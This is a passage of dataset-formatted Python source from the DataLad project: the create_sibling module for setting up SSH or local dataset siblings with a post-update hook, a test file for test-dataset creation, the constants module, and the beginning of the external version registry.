is not None:\n branch = ds_repo.get_corresponding_branch(branch) or branch\n # Setting the HEAD for the created sibling to the original repo's\n # current branch should be unsurprising, and it helps with consumers\n # that don't properly handle the default branch with no commits. See\n # gh-4349.\n shell(\"git -C {} symbolic-ref HEAD refs/heads/{}\"\n .format(sh_quote(remoteds_path), branch))\n\n if install_postupdate_hook:\n # enable metadata refresh on dataset updates to publication server\n lgr.info(\"Enabling git post-update hook ...\")\n try:\n CreateSibling.create_postupdate_hook(\n remoteds_path, shell, ds)\n except CommandError as e:\n ce = CapturedException(e)\n lgr.error(\"Failed to add json creation command to post update \"\n \"hook.\\nError: %s\", ce)\n\n return remoteds_path\n\n\ndef _ls_remote_path(ssh, path):\n try:\n # yoh tried ls on mac\n # escape path explicitly with shlex.quote as 'sh' is a POSIX shell and\n # sh_quote could decide to quote Windows-style\n # C.UTF-8 locale as opposed to C locale handles special characters (umlauts etc.)\n # ls falls back to C locale if LC_ALL is set to unknown locale, so this should be safe.\n ls_cmd = \"LC_ALL=C.UTF-8; export LC_ALL; /bin/ls -A1 {}\".format(shlex.quote(path))\n # TODO: Using sh_quote here is also flawed as it checks whether the\n # *local* machine is Windows. Doesn't help if the remote we're ssh'ing in is Windows.\n ssh_cmd = \"sh -c {}\".format(sh_quote(ls_cmd))\n out, err = ssh(ssh_cmd)\n\n if err:\n # we might even want to raise an exception, but since it was\n # not raised, let's just log a warning\n lgr.warning(\n \"There was some output to stderr while running ls on %s via ssh: %s\",\n path, err\n )\n except CommandError as e:\n if \"No such file or directory\" in e.stderr and \\\n path in e.stderr:\n return None\n else:\n raise # It's an unexpected failure here\n return [l for l in out.split(os.linesep) if l]\n\n\n@build_doc\nclass CreateSibling(Interface):\n \"\"\"Create a dataset sibling on a UNIX-like Shell (local or SSH)-accessible machine\n\n Given a local dataset, and a path or SSH login information this command\n creates a remote dataset repository and configures it as a dataset sibling\n to be used as a publication target (see `publish` command).\n\n Various properties of the remote sibling can be configured (e.g. name\n location on the server, read and write access URLs, and access\n permissions.\n\n Optionally, a basic web-viewer for DataLad datasets can be installed\n at the remote location.\n\n This command supports recursive processing of dataset hierarchies, creating\n a remote sibling for each dataset in the hierarchy. By default, remote\n siblings are created in hierarchical structure that reflects the\n organization on the local file system. However, a simple templating\n mechanism is provided to produce a flat list of datasets (see\n --target-dir).\n \"\"\"\n\n _params_ = dict(\n # TODO: Figure out, whether (and when) to use `sshurl` as push url\n dataset=Parameter(\n args=(\"--dataset\", \"-d\",),\n doc=\"\"\"specify the dataset to create the publication target for. If\n no dataset is given, an attempt is made to identify the dataset\n based on the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n sshurl=Parameter(\n args=(\"sshurl\",),\n metavar='SSHURL',\n nargs='?',\n doc=\"\"\"Login information for the target server. This can be given\n as a URL (ssh://host/path), SSH-style (user@host:path) or just\n a local path.\n Unless overridden, this also serves the future dataset's access\n URL and path on the server.\"\"\",\n constraints=EnsureStr()),\n name=Parameter(\n args=('-s', '--name',),\n metavar='NAME',\n doc=\"\"\"sibling name to create for this publication target.\n If `recursive` is set, the same name will be used to label all\n the subdatasets' siblings. When creating a target dataset fails,\n no sibling is added\"\"\",\n constraints=EnsureStr() | EnsureNone(),\n nargs=\"?\"),\n target_dir=Parameter(\n args=('--target-dir',),\n metavar='PATH',\n doc=\"\"\"path to the directory *on the server* where the dataset\n shall be created. By default this is set to the URL (or local\n path) specified via [PY: `sshurl` PY][CMD: SSHURL CMD]. If a\n relative path is provided here, it is interpreted as being\n relative to the user's home directory on the server (or\n relative to [PY: `sshurl` PY][CMD: SSHURL CMD], when that is a\n local path).\n Additional features are relevant for recursive processing of\n datasets with subdatasets. By default, the local\n dataset structure is replicated on the server. However, it is\n possible to provide a template for generating different target\n directory names for all (sub)datasets. Templates can contain\n certain placeholder that are substituted for each (sub)dataset.\n For example: \"/mydirectory/dataset%%RELNAME\".\\nSupported\n placeholders:\\n\n %%RELNAME - the name of the datasets, with any slashes replaced by\n dashes\\n\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n target_url=Parameter(\n args=('--target-url',),\n metavar='URL',\n doc=\"\"\"\"public\" access URL of the to-be-created target dataset(s)\n (default: `sshurl`). Accessibility of this URL determines the\n access permissions of potential consumers of the dataset.\n As with `target_dir`, templates (same set of placeholders)\n are supported. Also, if specified, it is provided as the annex\n description\\n\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n target_pushurl=Parameter(\n args=('--target-pushurl',),\n metavar='URL',\n doc=\"\"\"In case the `target_url` cannot be used to publish to the\n dataset, this option specifies an alternative URL for this\n purpose. As with `target_url`, templates (same set of\n placeholders) are supported.\\n\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n existing=Parameter(\n args=(\"--existing\",),\n constraints=EnsureChoice('skip', 'error', 'reconfigure', 'replace'),\n metavar='MODE',\n doc=\"\"\"action to perform, if a sibling is already configured under the\n given name and/or a target (non-empty) directory already exists.\n In this case, a dataset can be skipped ('skip'), the sibling\n configuration be updated ('reconfigure'), or process interrupts with\n error ('error'). DANGER ZONE: If 'replace' is used, an existing target\n directory will be forcefully removed, re-initialized, and the\n sibling (re-)configured (thus implies 'reconfigure').\n `replace` could lead to data loss, so use with care. To minimize\n possibility of data loss, in interactive mode DataLad will ask for\n confirmation, but it would raise an exception in non-interactive mode.\n \"\"\",),\n inherit=inherit_opt,\n shared=Parameter(\n args=(\"--shared\",),\n metavar='{false|true|umask|group|all|world|everybody|0xxx}',\n doc=\"\"\"if given, configures the access permissions on the server\n for multi-users (this could include access by a webserver!).\n Possible values for this option are identical to those of\n `git init --shared` and are described in its documentation.\"\"\",\n constraints=EnsureStr() | EnsureBool() | EnsureNone()),\n group=Parameter(\n args=(\"--group\",),\n metavar=\"GROUP\",\n doc=\"\"\"Filesystem group for the repository. Specifying the group is\n particularly important when [CMD: --shared=group CMD][PY:\n shared=\"group\" PY]\"\"\",\n constraints=EnsureStr() | EnsureNone()\n ),\n ui=Parameter(\n args=(\"--ui\",),\n metavar='{false|true|html_filename}',\n doc=\"\"\"publish a web interface for the dataset with an\n optional user-specified name for the html at publication\n target. defaults to `index.html` at dataset root\"\"\",\n constraints=EnsureBool() | EnsureStr()),\n as_common_datasrc=as_common_datasrc,\n publish_depends=publish_depends,\n publish_by_default=publish_by_default,\n annex_wanted=annex_wanted_opt,\n annex_group=annex_group_opt,\n annex_groupwanted=annex_groupwanted_opt,\n since=Parameter(\n args=(\"--since\",),\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"limit processing to subdatasets that have been changed since\n a given state (by tag, branch, commit, etc). This can be used to\n create siblings for recently added subdatasets.\n If '^' is given, the last state of the current branch at the sibling\n is taken as a starting point.\"\"\"),\n )\n\n @staticmethod\n @datasetmethod(name='create_sibling')\n @eval_results\n def __call__(sshurl,\n *,\n name=None, target_dir=None,\n target_url=None, target_pushurl=None,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n existing='error',\n shared=None,\n group=None,\n ui=False,\n as_common_datasrc=None,\n publish_by_default=None,\n publish_depends=None,\n annex_wanted=None, annex_group=None, annex_groupwanted=None,\n inherit=False,\n since=None):\n if ui:\n # the webui has been moved to the deprecated extension\n try:\n from datalad_deprecated.sibling_webui import (\n upload_web_interface,\n )\n except Exception as e:\n # we could just test for ModuleNotFoundError (which should be\n # all that would happen with PY3.6+, but be a little more robust\n # and use the pattern from duecredit\n if type(e).__name__ not in ('ImportError', 'ModuleNotFoundError'):\n lgr.error(\"Failed to import datalad_deprecated.sibling_webui \"\n \"due to %s\", str(e))\n raise RuntimeError(\n \"The DataLad web UI has been moved to an extension \"\n \"package. Please install the Python package \"\n \"`datalad_deprecated` to be able to deploy it.\"\n )\n\n # push uses '^' to annotate the previous pushed committish, and None for default\n # behavior. '' was/is (to be deprecated) used in `publish` and 'create-sibling'.\n # Alert user about the mistake\n if since == '':\n # deprecation was added prior 0.16.0\n import warnings\n warnings.warn(\"'since' should point to commitish or use '^'.\",\n DeprecationWarning)\n since = '^'\n\n #\n # nothing without a base dataset\n #\n ds = require_dataset(dataset, check_installed=True,\n purpose='create sibling(s)')\n refds_path = ds.path\n\n #\n # all checks that are possible before we start parsing the dataset\n #\n if since and not recursive:\n raise ValueError(\"The use of 'since' requires 'recursive'\")\n # possibly use sshurl to get the name in case if not specified\n if not sshurl:\n if not inherit:\n raise InsufficientArgumentsError(\n \"needs at least an SSH URL, if no inherit option\"\n )\n if name is None:\n raise ValueError(\n \"Neither SSH URL, nor the name of sibling to inherit from \"\n \"was specified\"\n )\n # It might well be that we already have this remote setup\n try:\n sshurl = CreateSibling._get_remote_url(ds, name)\n except Exception as exc:\n ce = CapturedException(exc)\n lgr.debug('%s does not know about url for %s: %s', ds, name, ce)\n elif inherit:\n raise ValueError(\n \"For now, for clarity not allowing specifying a custom sshurl \"\n \"while inheriting settings\"\n )\n # may be could be safely dropped -- still WiP\n\n if not sshurl:\n # TODO: may be more back up before _prep?\n super_ds = ds.get_superdataset()\n if not super_ds:\n raise ValueError(\n \"Could not determine super dataset for %s to inherit URL\"\n % ds\n )\n super_url = CreateSibling._get_remote_url(super_ds, name)\n # for now assuming hierarchical setup\n # (TODO: to be able to distinguish between the two, probably\n # needs storing datalad.*.target_dir to have %RELNAME in there)\n sshurl = slash_join(super_url, relpath(refds_path, super_ds.path))\n\n # check the login URL\n sibling_ri = RI(sshurl)\n ssh_sibling = is_ssh(sibling_ri)\n if not (ssh_sibling or isinstance(sibling_ri, PathRI)):\n raise ValueError(\n \"Unsupported SSH URL or path: '{0}', \"\n \"use ssh://host/path, host:path or path syntax\".format(sshurl))\n\n if not name:\n name = sibling_ri.hostname if ssh_sibling else \"local\"\n lgr.info(\n \"No sibling name given. Using %s'%s' as sibling name\",\n \"URL hostname \" if ssh_sibling else \"\",\n name)\n if since == '^':\n # consider creating siblings only since the point of\n # the last update\n # XXX here we assume one to one mapping of names from local branches\n # to the remote\n active_branch = ds.repo.get_active_branch()\n since = '%s/%s' % (name, active_branch)\n\n to_process = []\n if recursive:\n #\n # parse the base dataset to find all subdatasets that need processing\n #\n cand_ds = [\n Dataset(r['path'])\n for r in diff_dataset(\n ds,\n fr=since,\n to='HEAD',\n # w/o False we might not follow into new subdatasets\n # which do not have that remote yet setup,\n # see https://github.com/datalad/datalad/issues/6596\n constant_refs=False,\n # save cycles, we are only looking for datasets\n annex=None,\n untracked='no',\n recursive=True,\n datasets_only=True,\n )\n # not installed subdatasets would be 'clean' so we would skip them\n if r.get('type') == 'dataset' and r.get('state', None) != 'clean'\n ]\n if not since:\n # not only subdatasets\n cand_ds = [ds] + cand_ds\n else:\n # only the current ds\n cand_ds = [ds]\n # check remotes setup()\n for d in cand_ds:\n d_repo = d.repo\n if d_repo is None:\n continue\n checkds_remotes = d.repo.get_remotes()\n res = dict(\n action='create_sibling',\n path=d.path,\n type='dataset',\n )\n\n if publish_depends:\n # make sure dependencies are valid\n # TODO: inherit -- we might want to automagically create\n # those dependents as well???\n unknown_deps = set(ensure_list(publish_depends)).difference(\n checkds_remotes)\n if unknown_deps:\n yield dict(\n res,\n status='error',\n message=('unknown sibling(s) specified as publication '\n 'dependency: %s', unknown_deps),\n )\n continue\n if name in checkds_remotes and existing in ('error', 'skip'):\n yield dict(\n res,\n sibling_name=name,\n status='error' if existing == 'error' else 'notneeded',\n message=(\n \"sibling '%s' already configured (specify alternative \"\n \"name, or force reconfiguration via --existing\", name),\n )\n continue\n to_process.append(res)\n\n if not to_process:\n # we ruled out all possibilities\n # TODO wait for gh-1218 and make better return values\n lgr.info(\"No datasets qualify for sibling creation. \"\n \"Consider different settings for --existing \"\n \"or --since if this is unexpected\")\n return\n\n if ssh_sibling:\n # request ssh connection:\n lgr.info(\"Connecting ...\")\n shell = ssh_manager.get_connection(sshurl)\n else:\n shell = _RunnerAdapter()\n sibling_ri.path = str(resolve_path(sibling_ri.path, dataset))\n if target_dir:\n target_dir = opj(sibling_ri.path, target_dir)\n\n if target_dir is None:\n if sibling_ri.path:\n target_dir = sibling_ri.path\n else:\n target_dir = '.'\n\n # TODO: centralize and generalize template symbol handling\n replicate_local_structure = \"%RELNAME\" not in target_dir\n\n if not shell.get_annex_version():\n raise MissingExternalDependency(\n 'git-annex',\n msg=\"It's required on the {} machine to create a sibling\"\n .format('remote' if ssh_sibling else 'local'))\n\n #\n # all checks done and we have a connection, now do something\n #\n\n # loop over all datasets, ordered from top to bottom to make test\n # below valid (existing directories would cause the machinery to halt)\n # But we need to run post-update hook in depth-first fashion, so\n # would only collect first and then run (see gh #790)\n yielded = set()\n remote_repos_to_run_hook_for = []\n for currentds_ap in \\\n sorted(to_process, key=lambda x: x['path'].count('/')):\n current_ds = Dataset(currentds_ap['path'])\n\n path = _create_dataset_sibling(\n name,\n current_ds,\n refds_path,\n shell,\n replicate_local_structure,\n sibling_ri,\n target_dir,\n target_url,\n target_pushurl,\n existing,\n shared,\n group,\n publish_depends,\n publish_by_default,\n ui,\n as_common_datasrc,\n annex_wanted,\n annex_group,\n annex_groupwanted,\n inherit\n )\n currentds_ap[\"sibling_name\"] = name\n if not path:\n # nothing new was created\n # TODO is 'notneeded' appropriate in this case?\n currentds_ap['status'] = 'notneeded'\n # TODO explain status in 'message'\n yield currentds_ap\n yielded.add(currentds_ap['path'])\n continue\n remote_repos_to_run_hook_for.append((path, currentds_ap))\n\n # publish web-interface to root dataset on publication server\n if current_ds.path == refds_path and ui:\n from datalad_deprecated.sibling_webui import (\n upload_web_interface,\n )\n lgr.info(\"Uploading web interface to %s\", path)\n try:\n upload_web_interface(path, shell, shared, ui)\n except CommandError as e:\n ce = CapturedException(e)\n currentds_ap['status'] = 'error'\n currentds_ap['message'] = (\n \"failed to push web interface to the remote datalad repository (%s)\",\n ce)\n currentds_ap['exception'] = ce\n yield currentds_ap\n yielded.add(currentds_ap['path'])\n continue\n\n # in reverse order would be depth first\n lgr.info(\"Running post-update hooks in all created siblings\")\n # TODO: add progressbar\n for path, currentds_ap in remote_repos_to_run_hook_for[::-1]:\n # Trigger the hook\n lgr.debug(\"Running hook for %s (if exists and executable)\", path)\n try:\n shell(\"cd {} \"\n \"&& ( [ -x hooks/post-update ] && hooks/post-update || true )\"\n \"\".format(sh_quote(_path_(path, \".git\"))))\n except CommandError as e:\n ce = CapturedException(e)\n currentds_ap['status'] = 'error'\n currentds_ap['message'] = (\n \"failed to run post-update hook under remote path %s (%s)\",\n path, ce)\n currentds_ap['exception'] = ce\n yield currentds_ap\n yielded.add(currentds_ap['path'])\n continue\n if not currentds_ap['path'] in yielded:\n # if we were silent until now everything is just splendid\n currentds_ap['status'] = 'ok'\n yield currentds_ap\n\n @staticmethod\n def _run_on_ds_ssh_remote(ds, name, ssh, cmd):\n \"\"\"Given a dataset, and name of the remote, run command via ssh\n\n Parameters\n ----------\n cmd: str\n Will be .format()'ed given the `path` to the dataset on remote\n\n Returns\n -------\n out\n\n Raises\n ------\n CommandError\n \"\"\"\n remote_url = CreateSibling._get_remote_url(ds, name)\n remote_ri = RI(remote_url)\n out, err = ssh(cmd.format(path=sh_quote(remote_ri.path)))\n if err:\n lgr.warning(\"Got stderr while calling ssh: %s\", err)\n return out\n\n @staticmethod\n def _get_ds_remote_shared_setting(ds, name, ssh):\n \"\"\"Figure out setting of sharedrepository for dataset's `name` remote\"\"\"\n shared = None\n try:\n # TODO -- we might need to expanduser taking .user into account\n # but then it must be done also on remote side\n out = CreateSibling._run_on_ds_ssh_remote(\n ds, name, ssh,\n 'git -C {path} config --get core.sharedrepository'\n )\n shared = out.strip()\n except CommandError as e:\n ce = CapturedException(e)\n lgr.debug(\n \"Could not figure out remote shared setting of %s for %s due \"\n \"to %s\",\n ds, name, ce)\n # could well be ok if e.g. not shared\n # TODO: more detailed analysis may be?\n return shared\n\n @staticmethod\n def _has_active_postupdate(ds, name, ssh):\n \"\"\"Figure out either has active post-update hook\n\n Returns\n -------\n bool or None\n None if something went wrong and we could not figure out\n \"\"\"\n has_active_post_update = None\n try:\n # TODO -- we might need to expanduser taking .user into account\n # but then it must be done also on remote side\n out = CreateSibling._run_on_ds_ssh_remote(\n ds, name, ssh,\n 'cd {path} && [ -x .git/hooks/post-update ] && echo yes || echo no'\n )\n out = out.strip()\n assert out in ('yes', 'no')\n has_active_post_update = out == \"yes\"\n except CommandError as e:\n ce = CapturedException(e)\n lgr.debug(\n \"Could not figure out either %s on remote %s has active \"\n \"post_update hook due to %s\",\n ds, name, ce\n )\n return has_active_post_update\n\n @staticmethod\n def _get_remote_url(ds, name):\n \"\"\"A little helper to get url from pushurl or from url if not defined\"\"\"\n # take pushurl if present, if not -- just a url\n url = ds.config.get('remote.%s.pushurl' % name) or \\\n ds.config.get('remote.%s.url' % name)\n if not url:\n raise ValueError(\n \"%s had neither pushurl or url defined for %s\" % (ds, name)\n )\n return url\n\n @staticmethod\n def init_remote_repo(path, ssh, shared, dataset, description=None):\n cmd = \"git -C {} init{}\".format(\n sh_quote(path),\n \" --shared='{}'\".format(sh_quote(shared)) if shared else '')\n try:\n ssh(cmd)\n except CommandError as e:\n ce = CapturedException(e)\n lgr.error(\"Initialization of remote git repository failed at %s.\"\n \"\\nError: %s\\nSkipping ...\", path, ce)\n return False\n\n if isinstance(dataset.repo, AnnexRepo):\n # init remote git annex repo (part fix of #463)\n try:\n ssh(\n \"git -C {} annex init {}\".format(\n sh_quote(path),\n sh_quote(description)\n if description else '')\n )\n except CommandError as e:\n ce = CapturedException(e)\n lgr.error(\"Initialization of remote git annex repository failed at %s.\"\n \"\\nError: %s\\nSkipping ...\", path, ce)\n return False\n return True\n\n @staticmethod\n def create_postupdate_hook(path, ssh, dataset):\n # location of post-update hook file, logs folder on remote target\n hooks_remote_dir = opj(path, '.git', 'hooks')\n # make sure hooks directory exists (see #1251)\n ssh('{} {}'.format(mkdir_cmd, sh_quote(hooks_remote_dir)))\n hook_remote_target = opj(hooks_remote_dir, 'post-update')\n\n # create json command for current dataset\n log_filename = 'datalad-publish-hook-$(date +%s).log' % TIMESTAMP_FMT\n hook_content = r'''#!/bin/bash\n\ngit update-server-info\n\n#\n# DataLad\n#\n# (Re)generate meta-data for DataLad Web UI and possibly init new submodules\ndsdir=\"$(dirname $0)/../..\"\nlogfile=\"$dsdir/{WEB_META_LOG}/{log_filename}\"\n\nif [ ! -e \"$dsdir/.git\" ]; then\n echo Assumption of being under .git has failed >&2\n exit 1\nfi\n\nmkdir -p \"$dsdir/{WEB_META_LOG}\" # assure logs directory exists\n\n# Avoid file name collisions.\nsuffix=0\nlogfile_orig=\"$logfile\"\nwhile [ -f \"$logfile\" ]; do\n suffix=$(( $suffix + 1 ))\n logfile=\"$logfile_orig.$suffix\"\ndone\n\n( which datalad > /dev/null \\\n && ( cd \"$dsdir\"; GIT_DIR=\"$PWD/.git\" datalad ls -a --json file .; ) \\\n || echo \"E: no datalad found - skipping generation of indexes for web frontend\"; \\\n) &> \"$logfile\"\n'''.format(WEB_META_LOG=WEB_META_LOG, **locals())\n\n with make_tempfile(content=hook_content) as tempf:\n # create post_update hook script\n # upload hook to dataset\n ssh.put(tempf, hook_remote_target)\n # and make it executable\n ssh('chmod +x {}'.format(sh_quote(hook_remote_target)))\n" }, { "alpha_fraction": 0.5913705825805664, "alphanum_fraction": 0.6073241233825684, "avg_line_length": 29.9887638092041, "blob_id": "d2043158cec9fb775d49e5895f0dc854dfdb2fb5", "content_id": "01e849bc25f15eeb6b25b448ea1f08380e3cfe95", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2758, "license_type": "permissive", "max_line_length": 92, "num_lines": 89, "path": "/datalad/distribution/tests/test_create_test_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create testdataset helpers\n\n\"\"\"\n\nfrom glob import glob\nfrom os.path import join as opj\n\nfrom datalad.core.local.repo import repo_from_path\nfrom datalad.distribution.create_test_dataset import _parse_spec\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n assert_repo_status,\n eq_,\n ok_,\n with_tempfile,\n)\nfrom datalad.utils import (\n chpwd,\n swallow_logs,\n swallow_outputs,\n)\n\n\n@with_tempfile(mkdir=True)\ndef test_create(outdir=None):\n from datalad.api import create\n assert_raises(ValueError, create, outdir, description='Precious data', annex=False)\n\n\ndef test_parse_spec():\n eq_(_parse_spec('0/3/-1'), [(0, 0), (3, 3), (0, 1)])\n eq_(_parse_spec('4-10'), [(4, 10)])\n eq_(_parse_spec(''), [])\n\n\ndef test_create_test_dataset():\n # rudimentary smoke test\n from datalad.api import create_test_dataset\n with swallow_logs(), swallow_outputs():\n dss = create_test_dataset(spec='2/1-2')\n ok_(5 <= len(dss) <= 7) # at least five - 1 top, two on top level, 1 in each\n for ds in dss:\n assert_repo_status(ds, annex=None) # some of them are annex but we just don't check\n ok_(len(glob(opj(ds, 'file*'))))\n\n\ndef test_create_1test_dataset():\n # and just a single dataset\n from datalad.api import create_test_dataset\n with swallow_outputs():\n dss = create_test_dataset()\n eq_(len(dss), 1)\n assert_repo_status(dss[0], annex=False)\n\n\n@with_tempfile(mkdir=True)\ndef test_new_relpath(topdir=None):\n from datalad.api import create_test_dataset\n with swallow_logs(), chpwd(topdir), swallow_outputs():\n dss = create_test_dataset('testds', spec='1')\n eq_(dss[0], opj(topdir, 'testds'))\n eq_(len(dss), 2) # 1 top + 1 sub-dataset as demanded\n for ds in dss:\n assert_repo_status(ds, annex=False)\n\n\n@with_tempfile()\ndef test_hierarchy(topdir=None):\n # GH 1178\n from datalad.api import create_test_dataset\n with swallow_logs(), swallow_outputs():\n dss = create_test_dataset(topdir, spec='1/1')\n\n eq_(len(dss), 3)\n eq_(dss[0], topdir)\n for ids, ds in enumerate(dss):\n assert_repo_status(ds, annex=False)\n # each one should have 2 commits (but the last one)-- one for file and\n # another one for sub-dataset\n repo = repo_from_path(ds)\n if not hasattr(repo, 'is_managed_branch') or not repo.is_managed_branch():\n eq_(len(list(repo.get_branch_commits_())), 1 + int(ids < 2))\n" }, { "alpha_fraction": 0.5907204747200012, "alphanum_fraction": 0.6386269330978394, "avg_line_length": 36.33802795410156, "blob_id": "0c115a397a63d486d9860ef13fc0ad058278a921", "content_id": "c662e0c7d7f3634e0b17a047ce729c969aa5b820", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2651, "license_type": "permissive", "max_line_length": 93, "num_lines": 71, "path": "/datalad/consts.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"constants for datalad\n\"\"\"\n\nimport os\nfrom os.path import join\nimport re\n\n# directory containing prepared metadata of a dataset repository:\nDATALAD_DOTDIR = \".datalad\"\n\nDATASET_CONFIG_FILE = join(DATALAD_DOTDIR, 'config')\n\nARCHIVES_SPECIAL_REMOTE = 'datalad-archives'\nDATALAD_SPECIAL_REMOTE = 'datalad'\nDATALAD_GIT_DIR = join('.git', 'datalad')\n\n# pregenerated using\n# python3 -c 'from datalad.customremotes.base import generate_uuids as guuid; print(guuid())'\nDATALAD_SPECIAL_REMOTES_UUIDS = {\n # should not be changed from now on!\n DATALAD_SPECIAL_REMOTE: 'cf13d535-b47c-5df6-8590-0793cb08a90a',\n ARCHIVES_SPECIAL_REMOTE: 'c04eb54b-4b4e-5755-8436-866b043170fa'\n}\nWEB_SPECIAL_REMOTE_UUID = '00000000-0000-0000-0000-000000000001'\n\nARCHIVES_TEMP_DIR = join(DATALAD_GIT_DIR, 'tmp', 'archives')\nANNEX_TEMP_DIR = join('.git', 'annex', 'tmp')\nANNEX_TRANSFER_DIR = join('.git', 'annex', 'transfer')\n\nSEARCH_INDEX_DOTGITDIR = join('datalad', 'search_index')\n\nDATASETS_TOPURL = os.environ.get(\"DATALAD_DATASETS_TOPURL\", None) \\\n or \"https://datasets.datalad.org/\"\n# safeguard\nif not DATASETS_TOPURL.endswith('/'):\n DATASETS_TOPURL += '/'\n\nWEB_META_LOG = join(DATALAD_GIT_DIR, 'logs')\n\n# Format to use for time stamps\nTIMESTAMP_FMT = \"%Y-%m-%dT%H:%M:%S%z\"\n\n# in order to avoid breakage, import runner-related const\nfrom datalad.runner.gitrunner import GIT_SSH_COMMAND\n\n# magic sha is from `git hash-object -t tree /dev/null`, i.e. from nothing\nPRE_INIT_COMMIT_SHA = '4b825dc642cb6eb9a060e54bf8d69288fbee4904'\n\n# git/datalad configuration item to provide a token for github\nCONFIG_HUB_TOKEN_FIELD = 'hub.oauthtoken'\nGITHUB_LOGIN_URL = 'https://github.com/login'\nGITHUB_TOKENS_URL = 'https://github.com/settings/tokens'\n\n# format of git-annex adjusted branch names\nADJUSTED_BRANCH_EXPR = re.compile(r'^adjusted/(?P<name>[^(]+)\\(.*\\)$')\n\n# Reserved file names on Windows machines\nRESERVED_NAMES_WIN = {'CON', 'PRN', 'AUX', 'NUL', 'COM1', 'COM2', 'COM3',\n 'COM4', 'COM5', 'COM6', 'COM7', 'COM8', 'COM9', 'LPT1',\n 'LPT2', 'LPT3', 'LPT4', 'LPT5', 'LPT6', 'LPT7', 'LPT8',\n 'LPT9'}\n# Characters that can't be a part of a file name on Windows\nILLEGAL_CHARS_WIN = \"[<>:/\\\\|?*\\\"]|[\\0-\\31]\"\n" }, { "alpha_fraction": 0.5694360733032227, "alphanum_fraction": 0.5745078325271606, "avg_line_length": 33.44827651977539, "blob_id": "44b22ef30b7681463409761a22468619b5fd2389", "content_id": "3abe25cf6cbd929851efa8b7f1755040a237f101", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14985, "license_type": "permissive", "max_line_length": 90, "num_lines": 435, "path": "/datalad/support/external_versions.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Module to help maintain a registry of versions for external modules etc\n\"\"\"\nimport os.path as op\nimport re\nimport sys\nfrom itertools import chain\nfrom os import linesep\n\nfrom looseversion import LooseVersion\n\n# import version helper from config to have only one implementation\n# config needs this to avoid circular imports\nfrom datalad.config import get_git_version as __get_git_version\nfrom datalad.log import lgr\n\nfrom .exceptions import (\n CapturedException,\n CommandError,\n)\n\n__all__ = ['UnknownVersion', 'ExternalVersions', 'external_versions']\n\n\n# To depict an unknown version, which can't be compared by mistake etc\nclass UnknownVersion:\n \"\"\"For internal use\n \"\"\"\n\n def __str__(self):\n return \"UNKNOWN\"\n\n def __cmp__(self, other):\n if other is self:\n return 0\n raise TypeError(\"UNKNOWN version is not comparable\")\n\n\n#\n# Custom handlers\n#\nfrom datalad.cmd import (\n GitWitlessRunner,\n StdOutErrCapture,\n WitlessRunner,\n)\nfrom datalad.support.exceptions import (\n MissingExternalDependency,\n OutdatedExternalDependency,\n)\n\n_runner = WitlessRunner()\n_git_runner = GitWitlessRunner()\n\n\ndef _get_annex_version():\n \"\"\"Return version of available git-annex\"\"\"\n try:\n return _runner.run(\n 'git annex version --raw'.split(),\n protocol=StdOutErrCapture)['stdout']\n except CommandError:\n # fall back on method that could work with older installations\n out = _runner.run(\n ['git', 'annex', 'version'],\n protocol=StdOutErrCapture)\n return out['stdout'].splitlines()[0].split(':')[1].strip()\n\n\ndef _get_git_version():\n \"\"\"Return version of git we use (might be bundled)\"\"\"\n return __get_git_version()\n\n\ndef _get_system_git_version():\n \"\"\"Return version of git available system-wide\n\n Might be different from the one we are using, which might be\n bundled with git-annex\n \"\"\"\n return __get_git_version(_runner)\n\n\ndef _get_bundled_git_version():\n \"\"\"Return version of git bundled with git-annex.\n \"\"\"\n path = _git_runner._get_bundled_path()\n if path:\n out = _runner.run(\n [op.join(path, \"git\"), \"version\"],\n protocol=StdOutErrCapture)['stdout']\n # format: git version 2.22.0\n return out.split()[2]\n\n\ndef _get_ssh_version(exe=None):\n \"\"\"Return version of ssh\n\n Annex prior 20170302 was using bundled version, then across all systems\n we used system one if installed, and then switched to the one defined in\n configuration, with system-wide (not default in PATH e.g. from conda)\n \"forced\" on Windows. If no specific executable provided in `exe`, we will\n use the one in configuration\n \"\"\"\n if exe is None:\n from datalad import cfg\n exe = cfg.obtain(\"datalad.ssh.executable\")\n out = _runner.run(\n [exe, '-V'],\n protocol=StdOutErrCapture)\n # apparently spits out to err but I wouldn't trust it blindly\n stdout = out['stdout']\n if out['stderr'].startswith('OpenSSH'):\n stdout = out['stderr']\n match = re.match(\n \"OpenSSH.*_([0-9][0-9]*)\\\\.([0-9][0-9]*)(p([0-9][0-9]*))?\",\n stdout)\n if match:\n return \"{}.{}p{}\".format(\n match.groups()[0],\n 